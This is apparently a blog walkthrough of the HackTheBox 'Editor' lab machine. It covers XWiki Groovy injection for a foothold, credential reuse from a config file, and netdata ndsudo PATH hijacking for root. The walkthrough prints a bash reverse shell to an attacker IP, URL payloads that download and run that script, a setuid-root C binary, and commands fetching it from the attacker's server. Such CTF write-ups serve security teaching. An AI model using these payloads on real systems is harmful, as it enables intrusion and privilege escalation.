HackTheBox Editor Walkthrough
insidepwn
This was an easy linux machine , nothing much
Initial Enumeration
- So first I did nmap scan and found 3 ports to be open and a domain
editor.htbwhich you can add in you /etc/hosts
sudo nano /etc/hosts
<MACHINE_IP>:editor.htb
- When I go to the website , on first look it look like a code editor
- Then when I got onto 8080 I saw it is using an open source wiki platform Xwiki
Foothold and user.txt
Also one more thing that is visible was it version that was 15.10.8
Then I google the version and found its vulnerable , its CVE was CVE 2025-24983
Then I googled the CVE 2025-24983 for shell but I didn’t found any scripts for that mostly scripts tell that the website is vulnerable to CVE 2025-24983
Then I stumbled across this
githublink https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py which further helped me to exploit and get shellTo exploit it we need to first create a shell.sh script then upload it to website then run it . Below are the commands for it
└─$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1
- After creating a shell.sh start a python server in you local machine
└─$ python -m http.server 80
- Then I in the browser paste these and enter make sure to change <YOUR_IP>
http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln("wget%20-qO%20/tmp/shell.sh%20http://<YOUR_IP>/shell.sh".execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
- In this the you have upload the shell now to run run it and get shell do this
nc -lnvp 4444 #in you local machine
http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22bash%20/tmp/shell.sh%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
- In this we get the shell as xwiki
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.xx.xx.xx] 57484
bash: cannot set terminal process group (1129): Inappropriate ioctl for device
bash: no job control in this shell
xwiki@editor:/usr/lib/xwiki-jetty$ whoami
whoami
xwiki
xwiki@editor:/usr/lib/xwiki-jetty$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
Here in
/etc/passwdoutput we can see the user in/homedirectory is oliverOn your enumeration when you look this file
/usr/lib/xwiki/WEB-INF/hibernate.cfg.xml
xwiki@editor:/usr/lib/xwiki$ cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password
<lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password"></property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password"></property>
- Here in this file you will find ssh password of user oliver which is
theEd1t0rTeam99
ssh oliver@editor.htb
- Then enter the password and you will get shell and oliver which has user.txt
Privilege Escalation and root.txt
- First I ran sudo -l but it gets me nothing
oliver@editor:~$ sudo -l
[sudo] password for oliver:
Sorry, user oliver may not run sudo on editor.
- Then I ran ss -tulnp to show network sockets
oliver@editor:~$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.1:8125 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:44303 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8125 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:19999 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 50 [::ffff:127.0.0.1]:8079 *:*
tcp LISTEN 0 50 *:8080 *:*
At port 19999 we see a service running netdata
So I did port forwarding to see what I can do with this service
To port forward use the command below and open http://localhost:19999 in your browser
ssh -L 19999:127.0.0.1:19999 oliver@editor.htb
- When you click on the red banner which tell us to update version it shows us this
This shows us that the current version of netdata service is 1.45.2 and we need to update it
Then I googled to find if version is vulnerable or not and indeed it is , and the CVE was CVE-2024-32019
- PoC :-
Place an executable with a name that is on
ndsudo’s list of commands (e.g.nvme) in a writable pathSet the
PATHenvironment variable so that it contains this pathRun
ndsudowith a command that will run the aforementioned executable
- So first we create a malicious.c and compile it
└─$ cat malicious.c
// malicious.c
#include <unistd.h>
#include <stdlib.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", "-i", NULL);
return 0;
}
└─$ gcc -o nvme malicious.c
- Then we upload this in directory
/tmp, to upload it we need to start a python server first in local machine where we have our executable nvme
└─$ python -m http.server 80
- Then execute the following commands in oliver shell
cd /tmp
wget wget http://>YOUR_IP>/nvme
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
root@editor:/tmp# whoami
root
root@editor:/tmp# cd /root/
This is it for the machine . Hope you enjoyed solving it .
Thanks for reading the walkthrough. Hope you like it ! Do leave a comment for feedback or queries !!
Subscribe to my newsletter
Read articles from insidepwn directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by